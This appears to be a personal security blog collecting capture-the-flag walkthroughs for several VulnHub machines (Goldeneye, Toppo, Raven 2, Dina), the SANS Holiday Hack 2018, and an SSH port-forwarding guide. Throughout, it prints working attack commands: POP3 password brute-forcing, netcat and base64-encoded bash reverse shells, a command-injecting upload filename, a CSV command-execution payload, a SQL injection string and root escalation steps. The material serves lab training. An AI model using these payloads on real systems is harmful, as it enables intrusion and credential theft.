VulnHub Goldeneye Walkthrough

In this walkthrough, we’ll be looking at Goldeneye from VulnHub. This one was a lot of fun simply because of the flavor. It felt a lot like the OSCP labs as well. So let’s get started!

A typical Nmap scan reveals a few ports – 80 and 25.

geye1

nmap -sC -sV -v 192.168.109.133

We’ll check out the webpage but first let’s get another scan going in the background

nmap -sC -sV -v -p- 192.168.109.133

This will search for all ports not just the top 1000 while we do other things.

Navigating to the webpage gives us a fun taste of the box theme.

geye2

It also gives a directory to browse. Let’s see what’s there.

geye3

Well we don’t have any creds to try right now so we’ll come back later. Let’s look at the source of the home page first.

geye4

There’s not much here but let’s see what terminal.js is.

Here we have something interesting. It looks like we have two user names and one encoded password.

geye5

I’m going to use BurpSuite to decode it. Once BurpSuite is open, navigate to the Decoder tab and paste in the encoded string. Then click on the Decode as drop down on the right and select HTML. This reveals the password of InvincibleHack3r.

geye6

Now let’s try that login again.

geye7

It works and we get some more fun stuff and some hints. It’s a good thing we have our scanner going.

Before we leave let’s check the source of this page. Not much is here but at the bottom we do find out that Boris and Natalya are supervisors.

geye8

Now let’s go back to our nmap scan and see if it found the pop3 ports.

geye9

It looks like it did. Unfortunately, the password for Boris doesn’t work.

At this point, we have things we can do and since they might take a little time, let’s get them going at the same time.

First, we’ll get a pop3 brute force going. This is actually where I first ran into trouble. It’s very important to pick a good wordlist here. A lot of times I’ll just use the rockyou wordlist and go do something else while it churns away. In this case, it’s not an option. Hydra will crash after a couple minutes but it will give a suggestion to use a shorter wordlist (this is critical). Medusa won’t crash but it will throw errors and recover so I went with Medusa instead.  The problem is still a short password list. I ended up using a password top 10,000 from SecLists, but even that was too big, and I missed out on getting the password for Boris. His password wasn’t critical though. The password list that ultimately works the best in this case is called fasttrack.txt. It’s native to Kali unlike SecLists which is cloned from GitHub.

Ok so now we have a wordlist, but we need to pick our users. We could do all of them since the list is so short, but the webpage said Boris and Natalya were the administrators to send email to. The nice thing is that we can check their names first. Remember the smtp server on port 25. Let’s see who’s valid.

Using netcat (nc -nv 192.168.109.133 25) we can log into the smtp server. Using vrfy USERNAME we can check the response from the server. Boris and Natalya come back but the others do not. There no sense wasting time brute forcing users that don’t exists so let’s just create a text file with there names only.

geye11

Now we can use hydra or medusa to run through the password list.

hydra -L users -P /usr/share/wordlists/fasttrack.txt pop3://192.168.109.133:55007

or

medusa -U users -P /usr/share/wordlists/fasttrack.txt -h 192.168.109.133 -n 55007 -M pop3 -t 16

With hydra, you’ll want to keep the user names separate because it will crash. At least it did for me, and it won’t recover. Doing one at a time, it won’t run into issues before it finds the passwords.

geye41

Medusa will also have issues, but it will recover and continue, and you can do both names together.

geye13

Either way, after a couple minutes you’ll have passwords for both Boris and Natalya. For all Natalya’s trash talking, her password is actually worse than Boris.

geye12

geye14

Anyway, we’ll just let the brute force run while we do this other stuff.

Next we can start gobuster on the website to see if there are any other hidden directories. gobuster -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt  -u 192.168.109.133 (It won’t find anything)

Finally, we’ll start a nikto scan on the website while we guess passwords. nikto -h 192.168.109.133

This finds a fun page called /splashAdmin.php which gives us some more potential user names and a really good hint we’ll need later.

Users – Xenia and Janus

Hint – GCC is replaced with the FreeBSD alternative (A quick google search shows this as cc.)

geye10

By now our password brute force should be finished and we can put those credentials to good use.

Let’s log into the pop3 server and check out some emails.

nc -nv 192.168.109.133 55007
user boris
pass secret1!
List
Retr 1
Retr 2
Retr 3

geye15

There’s some fun theme stuff here, but nothing important. Let’s do the same with Natalya’s account.

geye16

Now we’re getting somewhere. We have a new page to check and some account creds. You will have to edit the etc/hosts file first as the email suggests. Then navigate to the site.

geye17

At the bottom of the page you can find it’s running moodle. Once logged in it looks like there’s a message from Dr. Doak. Clicking on the contact information shows that his email username is doak.

geye18

Let’s see how secure his password is.

hydra -l doak -P /usr/share/wordlists/fasttrack.txt pop3://192.168.109.133:55007

geye19

These secret agents really need to pick better passwords. Well let’s see what’s in his email.

geye20

Ok now we have some admin creds. Let’s log back into the website with these and see what we can find. Inside a page called My private files is a secret.txt file. Let’s see what’s in it.

geye21

geye22

Let’s view the file

geye23

Hmmm … that doesn’t seem too special. Maybe there’s more to it. Let’s download it and see what else we can find.

We can either run file or exiftool. Either way a base64 encoded string can be found in the image description.

geye24

Decoding this reveals a password for the admin account.

echo eFdpbnRlcjE5OTV4IQ== | base64 -d

geye25

Let’s log in one more time as the admin.

geye26

Now we can easily identify the Moodle version.

geye27

A quick Google search reveals that this version is exploitable and there’s a Metasploit module for it. You could also just search for it in Metasploit.

geye28

There is one important thing to point out with this module. The target id must be set manually. I know it says 0 is automatic, but it doesn’t work right and will fail. So just set the target to 0 before you run the exploit.

geye29

There’s one more thing you’ll have to do to get this to work. The spell check engine must be set to PSpellShell. If you look at the exploit code, it looks like this should be set during exploitation, but it’s not and you have set in manually.

geye31

geye42

Once this is set run the exploit and you should get a shell.

geye32

Now I’ll upgrade my shell using python. It’s not really necessary for this box, but it’s still nicer to work with.

python -c ‘import pty; pty.spawn(“/bin/bash”)’

There are a couple scripts I usually download and run at this point, but it turns out they are not super helpful. The exploits are there but buried. It was much easier to find by enumerating the kernel manually.

uname -a
cat /etc/lsb-release

geye34

The first search that pops up looks like it fits.

It’s C code so let’s use GCC and compile it on our box.

gcc 37292.c

It gives some warnings, but it looks like it compiled. Let’s see if it works.

geye35

I stated a python server and used wget to transfer the file.

Attcker box: python -m SimpleHTTPServer 80
Victim box: wget 192.168.109.128/a.out
Chmod +x a.out
./a.out

geye36

When we run it, it doesn’t work. One of the error messages is gcc: not found.

That’s odd right? Let’s look at the code and search for gcc.

geye37

So the code is compiling something else when it runs. Remember the hint about gcc being removed. The compiler on this box is cc. Let’s change the compiler in the code to cc and see if it works.

Just FYI: the script may freeze the shell. If it does, you’ll have to manually clean up the files and directories left by the exploit before trying the new version.

Once the new version using cc is run, a root shell spawns.

geye38

The root flag is hidden. Use ls -lah to find it.

geye39

The final reward is in a web directory you might have found earlier, but if not, take a look at the ending scene.

geye40

Well that was Goldeneye. The word list thing was a little frustrating, but theme of the box was really fun. Anyway, I hope you enjoyed the walkthrough. If you’d like to see a video walkthrough you can find it here. In the video, I also show how to get a shell without using Metasploit.

Happy Hacking!

-R3a50n

Vulnhub Toppo Walkthrough

toppo1

Today’s writeup is a machine called Toppo from Vulnhub. Toppo is rated at beginner level and is fairly simple to root. Depending on how you go about the privilege escalation, it could throw you off a bit.

I started off by running a typical nmap scan (nmap -sV -sC -v 192.168.2.92 -oN map1). It has SSH and Port 80 open. Let’s check out the web page.

toppo2

Here we have a blog site, but not much else. Let’s run a directory brute force to see if anything else can be found.

toppo3

Running gobuster provides us with an interesting admin directory. Gobuster -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u 192.168.2.92

 

toppo4

In the admin directory are some notes.

toppo5

The notes give us the user name and password for something. Let’s try it out on SSH.

toppo6

SSH worked!

toppo7

Checking some basics like the bash history and sudo permissions doesn’t yield anything. So I used wget to bring over linuxprivcheker.py and ran it.

python -m SimpleHTTPServer 80

wget 192.168.2.30/linuxprivchecker.py

toppo8

When running the script something interesting happened. It said I was already root.

toppo9

What’s happening here is that python runs as root. This means that if we spawn a shell with python, we can be root too.

python -c ‘import pty; pty.spawn(“/bin/bash”)’

toppo10

Ok so what went wrong? The script clearly ran as root (it even dumped the shadow file), so why didn’t we get a root shell? Somethings not right. Let’s try it again with sh.

toppo11

Ok that worked. Now we’re root. It looks like bash will always run under the context of the ted user, but sh works normally. Now we can get the flag.

toppo12

That’s Toppo. It’s a basic and quick box to pop. If you used sh with python from the start, you’d completely miss the weird bash issue. Another way to do it would have been to spawn a python reverse shell. Alternatively, it might have been possible to crack the root password from the shadow file dump (after running linuxprivchecker), but I didn’t try it.

If you’d like to see a video walkthrough with the python reverse shell, you can find it here.

Hope you found this helpful.

-R3a50n

Vulnhub Raven 2 Walkthrough

raven32

Well I did Raven 1 a while back, so I decided to give Raven 2 a try. It proved to be a lot more challenging.

I started out doing the nmap scan: nmap -sC -sV -v 192.168.2.93 -oN map1

This listed an open webpage similar to last time.

raven1

Next I opened up a web browser and navigated to the page. I’ll also say that I prepped my box by adding raven.local to the /etc/hosts file. It’s not critical, as the exploit doesn’t need it, but it does help while you’re just navigating the web pages.

The page looks identical to Raven 1.

raven2

Running nikto against it shows that WordPress is still available (nikto -h 192.168.2.93). This, however, is a rabbit trail. Trying to brute force the users like in Raven 1 won’t get you anywhere and will take a long time.

raven3

To find other directories, I like to run gobuster (gobuster -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u 192.168.2.93)

A directory called vendor sticks out.

raven4

In the vendor directory is a file called PATH. Let’s see what’s in it.

raven33

Inside is the first flag! It also shows the path to the web root. It’s common but we’ll make note of that for later.

raven6

Also in the vendor directory is a file called VERSION along with a lot of references to phpmailer.

raven5

The version appears to be 5.2.16. Let’s look to see if it’s vulnerable.

raven7

Using searchsploit (searchsploit phpmailer 5), I found several exploits for that version of phpmailer including a Metasploit module. The problem is that all of them failed out of the box. I ended up choosing the .pl exploit for reasons I’ll explain below.

raven9

Since none of my other enumeration provided any optional paths, I felt fairly strong that this was the way in. I just needed to figure out what was breaking the exploits.

First, I wanted to see what the web request looked like. BurpSuite helped me out there.

raven8

One of the things I clued in on right away is that the request variables were not the same as in the exploits and one was missing (the subject).

After reviewing the exploit code, it became clear that I needed a few things. I needed to edit the post fields to match what’s in Burp and I needed a read/writeable directory that was accessible to the web. I chose the .pl file because the code was simple and I could easily edit those fields along with the payload. There were two types of payloads built into this exploit. Other exploits, like Metasploit for example, didn’t have all of those as an option and I didn’t want to dig into the back end of the exploit. The funny thing is that this code is not written in perl. It’s clearly python.

raven10

The original code looks like this:

raven11

The highlighted items are all things that need to be adjusted. The php code will work fine for a test, but we’ll have to change that to exploit the box.

I changed the URL to the contact page, the php code to a command shell, set the action to submit, the name to r3a50n (I wasn’t sure if a space would cause an issue), and added a subject. I also uncommented out the first payload as I thought that was more applicable.

The read/write directory did take some discovery.

raven12

The original code put the RW directory in uploads. The problem here is that there wasn’t an uploads directory. WordPress had one though. There’s even a flag hidden there.

raven13

This seemed like a good hint for a writable directory, so I tried it out. It failed. I then tried everything along that path, backing up one directory every time. Finally, I had success in the web root directory.

My final code looked like this:

raven14

Once I launched the exploit, the code was in place.

raven15

Now we can test for code execution. By adding ?cmd=id we can see if the code executes. Viewing the web page source will make it a lot easier to read.

raven16

We have code execution. Now let’s try to get a shell. Luckily for us, a version of netcat is installed that allows reverse connections to get a shell. That makes it easy. I started up a listener (nc -nlvp 9999) then ran ?cmd=nc -nv 192.168.2.30 9999 -e /bin/bash in the command shell.

Once I hit enter I had a shell!

raven17

Now I needed to upgrade it.

python -c ‘import pty; pty.spawn(“/bin/bash”)’

Ctl z

stty raw -echo

fg

raven18

Now we have up arrow and ctl c just like a regular shell. This will be really nice later when we need to access the MySQL database

Next we’ll send over linuxprivchecker to help with privilege escalation

Set a python webserver in the directory with the priv checker script

raven19

I then moved to the tmp directory since it’s typically world writeable and used wget to transfer the file.

raven20

… And then I ran it.

Two exploits came to the top of the list. One I ruled out since it required a brute force of SSH keys and this box uses password only. The other one looked like a good candidate but we need to get the MySQL database password first.

raven21

Inside the WordPress  directory is a file called wp-config.php. This file usually contains the password we need.

Cat wp-config.php | grep password -A2 displays the password R@v3nSecurity

raven23

Now let’s test it out. If you were wondering why upgrading the shell is so important, this is why. Accessing MySQL will not work in a basic shell.

Type mysql -u root -p then put in the password when prompted. This should bring you to a MySQL prompt.

raven24

In here we could extract and crack WordPress passwords, but that won’t help us at this point. For now, we can just log out of MySQL by typing quit and work on getting the exploit working.

The first thing the exploit needs is to be compiled. Gcc isn’t on the raven box so I had to compile it on my Kali host. The exploit does a good job of walking through the commands which makes it so much nicer. As nice as it is, there’s still a typo. The W1 (as in the number one) is actually Wl (as in lower case L).

After following the commands in the exploit, you should end up with a file ending in .so. Copy that file over to the raven box using python web server and wget as before.

raven25

Then continue to follow the exploit instructions using mysql.

Eventually the commands will produce an error.

raven26

The error states that it can’t fine the file and gives the path where it’s looking for it. To fix this issues, just redo previous select statement with the path provided in the error. It should read something like: select * from foo into dumpfile ‘/usr/lib/mysql/plugin/priv.so’;

Now when we run the command again we get no errors.

raven27

With that in place we should be able to run commands as root. Let’s try out the proof.

raven28

That worked! Now to get a root shell.

I just spawned another netcat listener and used the same netcat shell as before on port 8888

raven30

The command hangs as soon as it’s entered, but back in our shell window we get a connection as root!

raven31

I used python to upgrade my shell again (not necessary but it’s just nicer).

Then I went for the root flag.

raven29

That ends Raven 2. It was significantly more difficult than Raven 1. Raven 1 was basically brute force a password and then sudo for root. Version two required a lot more effort which I honestly was not expecting. Anyway, I did learn some things, which is always the goal, so that’s good.

Update 2/24/2019: I finally uploaded a video walkthrough. You can view it here. I struggled at the end because of a stupid copy/paste error but I eventually get there.

-R3a50n

Dina Walkthrough

dina18

Hi All,

This post is a walkthrough for Dina 1.0.1 on Vulnhub.

Dina uses DHCP so you’ll have to figure out what the IP is. Using netdiscover -r IPRANGE will help you with that.

First thing to do is to run a nmap scan … nmap -sC -sV -v IPADDRESS -oN OUTPUTFILE

dina1

There’s not much to go off of except a webpage. It does list the directories from the robots.txt file. Let’s go to the webpage and see what’s there.

dina2

Not much here even when looking at the source. Let’s try some of the robot.txt directories.

dina3

This is not a normal error message. Let’s look at the source.

dina4

Ok so this is interesting. Somebody thought it was a great idea to put a bunch of passwords in the source of the webpage. This is a very simple example of security by obscurity and it doesn’t work. Unfortunately, we don’t have anything to try the passwords on. The other robot.txt directories didn’t turn up anything. Let’s do some more enumeration.

Running nikto on the site (nikto -h IPADDRESS) gives us some more directories to look at. One of them is called secure … that might be interesting.

dina5dina6

Inside the secure directory is a file called backup.zip. I couldn’t unzip it with native Kali tools, so I put it in Windows and used 7zip. It prompts for a password. Luckily, we have a few to try.

dina7

The first password in the list (freedom) worked and I was able to extract the mp3 file. Sometimes in CTFs, they put challenges into audio files. I was all prepared with my audio editor except the file wouldn’t load. It wasn’t an mp3.

dina8

Running file against the mp3 revealed that it was just a text file.

I renamed the file to a text file and took a look at it.

dina9

This gives us a user name and a new url with a login. Let’s check it out!

dina19

 

On the page is something called playSMS. Using the user name touhid and running through the password list from earlier, I was able to login with the password diana.

dina20

 

At this point, I looked for places to upload files or code. There was one place that allowed a file upload, but the file itself never really wrote to the system. I went to Google and searched for playSMS exploits and I found one in exploitDB. There are also two Metasploit modules that work on this VM. The manual way is more interesting though, so I’m going to show that method. If you can’t get it to work, go the Metasploit route.

dina21

The key here is the filename. After the upload, the system will display the filename. If the filename contains php code, the code will execute. In the example they are running the system command uname -a. Let’s try it and see what happens.

dina10

dina11

Now we have code execution! The only problem is that slashes / are not allowed in files names. That makes it really hard to get a reverse shell. They system does have netcat, but it’s not a version with the gaping security hole (-e flag). The solution is to encode the command string and get the system to run it on the other side.

First, let’s find a reverse shell to use. I used this from pentestmonkey: bash -i >& /dev/tcp/192.168.2.30/7777 0>&1

Now echo that into base64: echo “bash -i >& /dev/tcp/192.168.2.30/7777 0>&1” | base64

This gave me YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIuMzAvNzc3NyAwPiYxCg== as the encoded string. Yours will be different based on the IP address and port number.

dina12

So now we have an encoded string that should give us a reverse shell. Now we need to set up the filename to decode and run it on the other end.

Inside the single quotes where we had uname -a, we’re going to replace that with: echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIuMzAvNzc3NyAwPiYxCg== | base64 -d | bash

What we’re doing is echoing the string, piping it into base64 (decoding it with the -d flag), and finally piping the string to bash for execution.

Now we need to get our listener setup: nc -nlvp 7777

dina13

Once the file is uploaded, we get a shell!

dina14

The first thing I do after this is spawn a better shell: python -c ‘import pty; pty.spawn(“/bin/sh”)’

dina15

Now I can do things like sudo. Let’s check our sudo permissions with sudo -l.

dina16

This is awesome! We can run Perl commands as root. Googling for reverse shells, I easily found this one using Perl: perl -e ‘exec “/bin/bash”;’

The only change is that we’ll have to use the full path to Perl for this to work.

dina16

ROOT!

Navigating to the root directory and viewing the root flag is now possible.

dina17

That’s the box. It was definitely beginner level especially if using Metasploit. Hopefully you found it helpful.

If you want to see a video walkthrough where I also show the Metasploit path, you can view it here on YouTube

 

-R3a50n

 

 

 

SANS Holiday Hack 2018 Kringlecon

kc00

Hi All,

I thought I’d post my walkthroughs for the objectives and challenges from SANS Holiday Hack. This is a hack challenge put on by Ed Skoudis and his team. They also keep past challenges up which is pretty cool!

This years theme was that of a convention. After creating an gravitas, I had to walk around to view the various challenges. Most challenges brought me to a terminal screen where a message would give me some direction to solve the puzzle. There’s also some really good speaker talks available inside the con (or on YouTube if you prefer) that apply directly to the puzzles.

Word of warning: I wouldn’t directly copy any of the commands from this text. Please type them in manually. Editors do weird things to single and double quotes that can mess up the command. You have been warned!

 

Vi Escape

The first one was very simple … escape Vi. For those that don’t know, Vi is a text editor used in Unix/Linux environment. It’s renown for its powerful yet obscure command interface. If you don’t use it, it’s easy to forget how to do very basic things … like how to exit the interface.  /Steps on soapbox: I never use Vi (unless forced) because I think it’s ridiculous for such an un-user friendly interface to exist in 2018. Nano, for example, has always been able to do everything I needed while still being intuitive. The infosec community needs to demand more from their tools, not cave to the pressure of elitists jerks who thinks anyone who doesn’t use vi or vim is a noob /end soap box rant.

kc1

So to exit vi you need to type :q! and press enter. There’s actually a shell escape with Vi that will dump you to the prompt without actually exiting vi. That won’t work. They really want you to exit Vi properly.

kc2

And here’s the confirmation message.

kc3

 

Who wrote the poem?

This challenge was also simple in that they gave away the location of the answer right in the opening message.

kc4

So basically they tell you to read a history file to find a name. History files are usually hidden so I looked at all the files in the elf home directory to see if it might be there. It sure was.

kc5

After viewing the .viminfo file, a name stuck out right away. Notice how there was also interaction with a .secrets directory and the poem.txt? This is probably the name we’re looking for. Let’s try it!

kc6

Yep that was it! Two challenges down. The rest will most certainly be harder.

kc7

 

The locked door.

Ok so there’s this door. It has a 4 code combination. The previous code persists and seems to operate in a fist in first out (FIFO) kind of way. So by adding a new code block, the first is pushed off and the code block added is now the last code in the sequence. I would love to say that I knew exactly how to compromise the code, but I don’t. I literally just randomly clicked and opened the door in 10 seconds. I was clicking so fast I actually don’t know what the code was. I just received the achievement and noticed the door was open. There are 256 permutations (4^4). I started making a table but random luck proved to be much faster. UPDATE: After I solved some other challenges I learned that this can be solved by using the Bruijn Sequence.

kc8

 

Find the compromised account

This one was tedious for me mainly because I kept getting kicked off the server every 10 minutes. The challenge is to find the account that was compromised by a password spray. Password spraying is like brute forcing in reverse. Instead of trying 100 passwords against a single user account, the attacker tries one password against 100 user accounts. This gets around lockout attempts and is very effective since users tend to pick really bad (guessable) passwords. Don’t make your password something like Mycompany2018!

The first thing I did was list out the directory. I had no idea what evtx_dump.py did so I ran the help command on it. It seemed to take an evtx file (I didn’t know what that was either) and turn it into xml. I chose to dump it into a file so I could run searches off of it faster, but you don’t have too.

kc9

Once the file was ready, I simply looked at it to see what was there. It was a log file. With password spraying, the logs should contain multiple failed users access attempts coming from a single IP address. So if I get a list of IP addresses and find the address with lots of different users, I’ll know which address the attack was coming from. Once I have that I can look for successful accesses attempts from that IP and check the user name.

kc10

To get the address list I just grepped the file and sorted/filtered it for unique

kc11

I then went down through the list and counted how many times an IP address showed up.

grep ‘IPADDRESS’ log.txt | wc -l

Remember with password spraying there should be a lot of attempts. 172.31.254.101 was one of the addresses that floated to the top of my list. I then used this command to view just the user names. The -A and -B commands just include the 20 lines before and after the line I grepped for. Without those flags, the data wouldn’t be available to pipe to other grep commands.

grep “172.31.254.101” log.txt -A 20 -B 20 | grep TargetUserName

Looking through the list of names, it became very clear that this is the attacking IP. Notice how the names are in alphabetical order? That’s what bad looks like. I also got lucky here in that the user minty.candycane had other event data that happened to stick out in my search. I though that was worth a try.

kc12

It worked! Just as a reminder, SeasonYear! is also a bad password.

kc13

 

Escape from PY jail

kc14

This was really fun. When I first ran into this terminal I wasn’t sure how to go about it. Basically, the terminal is a python session but certain commands have been black listed. Commands like exec, os.system, import and compile will not work. These are the typical commands python uses to interact with the operating system. After the 100th time of getting kicked off the server, I decided to check out one of the kringlecon talks. It proved to be exactly what I needed. The talk was AWESOME. Check it out https://www.youtube.com/watch?v=ZVx2Sxl3B9c

It’s literally all about how to break out of a python jail 😊

First, I ran commands to see what exactly was allowed or not. It turns out that eval was still allowed though import was not. I then followed the advice in the talk and broke up the import command string into two parts. It ran without issue and now the os module was loaded.

kc15

os.system was still not allowed and this was a wrinkle not covered in the talk.

kc16

I decided to use the same principle and name a variable to os. It worked just fine and I was able to get command execution.

kc17

With command execution in hand, I simply ran ./i_escaped and claimed my prize.

kc18

 

Google Ventilation Maze

This was fun just because it brought back some map making nostalgia. Maybe there’s a better way to beat it, but I had fun just making a map. Luckily, I had some graph paper laying around which made it so much nicer. The maze was divided into two areas. An upper and a lower area. The maze starts in the lower area and the finish is in the upper area. If you didn’t want to make a map, you could also just keep turning right.

Anyway, here’s my smudgy map. S is the start in the lower left. At the top right leads UP to the next section of the maze.

kc19

In the second section, I marked the start with a D for down. The exit is at the F on the right.

kc20

At the end it dropped me into a room where Santa had captured Hans. There were some additional challenges in this room. It also seemed to bypass a badged door challenge.

kc21

 

Curl Master

In this challenge, the user is supposed to help restart a service by using a website call that is not acting as expected. I’m not exactly a curl master, but it turns out that I didn’t really need to be.

kc22

One of the first things I always do is look around to see what’s available. In this case, there was a bash history file.

kc23

Viewing the history shows a curl command that was recently run. I wanted to see what it did so I ran it as well and found some directions.

kc24

The website is using http2 which curl can handle. The only thing left to do was to make the command a POST request and add a parameter. I remembered how to do the POST request, but I had to google the parameter. It was about as simple as it gets.

kc25

With the two options (-X and -d) added, the challenge was complete.

kc26

 

Find the Name

For this challenge, I had to search for a name in a database. The only catch is that they don’t actually give you access to the database.

kc27

Looking at the options, verify the system jumped out at me as being odd. After selecting it and putting in some junk input, it became very clear that this was simply running a ping command. It also gave some SQLite version and database information.

kc28

Well since the system is running the ping command, let’s see what happens if we string commands together. The first command will ping the localhost and the second will run the ID command.

kc29

The ID command ran successfully. Now I have some command execution.

kc30

I tried running a bash command next, but it just brought me back to the initial prompt. I would learn why later. Instead, I just dropped into the sqlite prompt by appending sqlite3 to the command string. The prompt got buried by the ping replies, so I had to press enter once they stopped to get the prompt to actually appear.

kc31

SQLite uses dot commands. By pressing .help I was able to learn how to interact with the database.

kc32

Here the commands showed me some helpful things … open a file and shell commands. The shell command we’ll use later. For now, we need to open the database.

kc33

The name of the database was given to us with the ping command. Once it’s open, looking at the table schema will show what fields are available to search.

kc34

Here I’m using a simple select statement to show everything that includes chan in the last name field. The first name Scott comes right up.

kc35

Now it’s time to use the .system command and claim the reward.

kc36

Just for kicks I used the system commands to get a shell. It works with sh but not with bash. Bash apparently has been setup to run the start menu. That’s why I couldn’t get it to work chaining bash to the end of the ping command.

kc37

 

Find the password and upload a file.

For this challenge, I had to upload a file to a SMB share that the user had forgotten the password.

kc38

Using PS to view processes and commands was a bit confusing because the full command was getting cut off.

kc39

Once I realized this, I pipped it to a file and then viewed it. I was able to identify the password and the upload string.

kc40

Using smbclient, I was able to access the remote share.

kc41

Once connected to the share, a simple PUT command placed the file where it needed to be.

kc42

With the report uploaded, the challenge completed.

kc43

AD Privilege Discovery

For this objective, I had to search Bloodhound for a kerberoastable user that would lead to domain admin. I’ve used Bloodhound before, so this was a piece of cake. Bloodhound came pre-installed on the VM they give you and fully loaded with the search in place. Honestly, that’s the hard part of using Bloodhound.

kc44

Bloodhound comes with a lot of helpful prebuilt queries. One of them just happens to be path to domain admin via kerberoastable user.

kc45

Even with this query, it leaves several options to explore. One of the hints suggested that RDP paths should be ignored. Luckily, there is a filter we can set.

kc46

Simply remove the check box on RDP and run the query again.

kc47

Now we have a very strait path and our user sticks right out.

kc48

Objective Complete!

 

Dev Oops

Ok this one was painful. Somewhere in this git repository is a password. Inside the kcconfmgmt is a hidden .git folder.

kc49

I then recursively grepped for password inside the .git folder.

kc50

This lead me to two potential files. Thanks to the hints, I know that the files I’m looking for are inside the objects directory and referenced by the fist two bytes.

kc51

If you didn’t grep for password, another way would have been to write a script to brute force every directory looking for the password. I started to do that, but then wised up.

Since there were only two files that showed up in our grep, it was easy enough to show both files. The command git show 60a2ffea7520ee980a5fc60177ff4d0633f2516b will display the password.

kc52

twinkletwinkletwinkle is the password.

kc53

 

HR Incident Response

This was interesting. The objective was to upload a malicious CSV to gain access to a file. The hint really helped to get the syntax right. First, I tried to create the csv in Excel, but that was awful. Excel kept trying to execute the code and then would throw reference errors that overwrote the code I just put in whenever I tried to save it. I then used notepad++ and was much happier.

In order to create the code, I had to know some file paths. Luckily the challenge itself provided the directory of the file I was after, but the website also displays it after uploading a file. The second file path can be found by adding things to the end of the URL which forces an error page to display.

kc54

With those two things, I could now copy the file I needed to the public page where I could download it. I’m not sure why the pipe | string has to be there but that’s the syntax I found in the example. The cell reference at the end is also important so don’t forget to add it.

They syntax is =cmd|’ /C copy c:\candidate_evaluation.docx c:\careerportal\resources\public\FILENAME’!A0

kc55

Once uploaded, you get a nice little message. This is also where you would find the directory for the original file had it not been given.

kc56

Then just navigate to the public page with the file name you chose, and the download will start.

kc57

With the document in hand, just read through the first candidate to find the evil organization Fancy Beaver

kc58

kc59

 

The Badged Door

Ok this one was crazy. I still don’t really understand it. The goal is to create a QR code badge that contains a SQL injection. They give you a sample badge, but that didn’t seem to help at all. I used an online decoder, but it just returned a random string. They do give you a site to create your own QR code and a link to OWASP for SQL injection. I couldn’t get any of those to work except that I did get the door to produce an error message. I had to use BurpSuite as a proxy to capture the error message. Otherwise it just scrolled by too fast to be of use.

kc60

This was the error message I received:

{“data”:”EXCEPTION AT (LINE 96 \”user_info = query(\”SELECT first_name,last_name,enabled FROM employees WHERE authorized = 1 AND uid = ‘{}’ LIMIT 1\”.format(uid))\”): (1064, u’You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near \\’\”\\’ LIMIT 1\\’ at line 1′)”,”request”:false}

Notice the word enabled? That proved to be very important.

Since I couldn’t get anything from OWASP to work, I used a list from Netsparker. The trick, as I mentioned before, was the word enabled in the error message. I thought that might be a good substitution for a TRUE statement and tried it in place of other statements like 1=1.

kc61

‘ or enabled# is the command that ultimately worked, but I don’t know why the # needed to be in there. I’m not even sure where this fits within the error message (maybe after the uid =’ ???). The best I figured is that the # comments out the rest of the statement leaving the enabled as the defining term but I still don’t really get it.

I just put that string into the QR code generator and created a png file.

kc62

Once uploaded, the access panel turns green and the control number is displayed. I assume that if you hadn’t completed the maze challenge the door would open. Since I did the maze first, the door was already open.

kc63

 

Winning the lottery

kc64

In this challenge, I had to win the lottery for one of the elves. I had no idea what I was doing, but a SANS write up (one of the hints) really walked me through it well.

Looking at the directory, gdb and the lottery file can be seen. Typing nm and the lottery file shows the names of the different function calls.

kc65

kc66

Winnerwinner sticks out pretty well. That’s probably the one we need.

First, I had to set a break point in the main program and then run the program. The program breaks (pauses) right after starting.

Next, I had to call the function. Using the command jump winnerwinner was all that was needed.

kc67

Once the function call was placed, the challenge was over.

kc68

 

Find the secret password in a GitHub repo

This objective can be completed by following one of the featured talks. Using a program call trufflehog, I searched the provided GitHub repository to produce the password. Now I probably should have just run the Windows installer, but I like having all of my tools in Kali. Though I followed the instructions exactly, truffleHog did not run at all. It turns out that it had a problem with loading git with python3. Python2, however, worked ok. It still through some errors at the end, but I got what I needed.

The first trick is to install truffleHog. Here are the basic steps:

  1. Clone the GitHub repo for truffleHog
  2. Use pip install truffleHog to get the dependencies

Even though the talk clearly pointed out Python3, I could not get that to work. In the end I used python truffleHog.py –regex –entropy=True PATH/TO/GIT/REPO

kc69

The password showed up several times along with some other interesting things like RSA keys.

kc70

Yet another Die Hard reference and that ended the Holiday Hack for me this year. There were a few more terminal challenges in Santa’s secret room that I didn’t complete along with 3 objectives. They were more Blue Team/forensic focused which is not as interesting to me. They were also much harder to complete based on the difficulty rating.

Anyway, I hope you enjoyed the walkthrough such that it is. The Holiday Hacks are left up all year long (including past challenges). This is incredibly generous of Ed Skoudis and his team so please take advantage of it! The YouTube talks are also really well done, interesting, and super helpful in solving the challenges. So please check them out!

-R3a50n

SSH Port Forwarding

Update 4/9/2019: So anyone interested in this topic should read this article from Black Hills Information Security. Carrie Roberts does a much better job than I do at explaining how to do this and she implements it better. Anyway, I’m leaving my article up in the event that someone finds it useful, but seriously, go read the other article.

Today I’m going to attempt to explain how to do some different SSH port forwards. There’s a lot of different reasons to use port forwards, but I’ll be putting this in perspective of conducting a pentest from a remote computer. Buckle in because this can get a little confusing. Also, my images got a little too compressed so the commands get hard to read. Don’t worry. I added the text into the blog as well. 🙂

First, I’ll set the scenario. Computer A is the machine I want to conduct a penetration test with. It’s a virtual machine (VM) that a client has downloaded and installed in their local environment. Computer B is in the Amazon cloud and simple acts as an intermediary. Computer C is my local machine. What I want to do is run commands on computer A from computer C. This is fairly simple to setup.

sshblog1

There are three stages to this setup. First computer A creates a reverse ssh connection with computer B. So Computer A connects to B via ssh on port 22. At the same time, it establishes a local listener on Computer B port 2200 that will forward traffic back to itself over the established ssh connection. Now Computer C just needs to ssh into Computer B as normal. This establishes a ssh terminal enabling me to run commands on Computer B. So now I’m on Computer B running commands from computer C. Hopefully that makes sense. Now I issue another ssh command on Computer B’s local port 2200. The reverse connection kicks in and forwards my commands to Computer A. Scenario one complete. I can now run commands on Computer A from Computer C and it’s completely seamless.

CompA:
ssh -N -i PATH/TO/Key/File – R 2200:localhost:22 UserName@AddressForCompB

CompB:
ssh -p 2200 UserForCompA@localhost

CompC:
ssh -i PATH/TO/KEY/FILE UserName@AddressForCompB

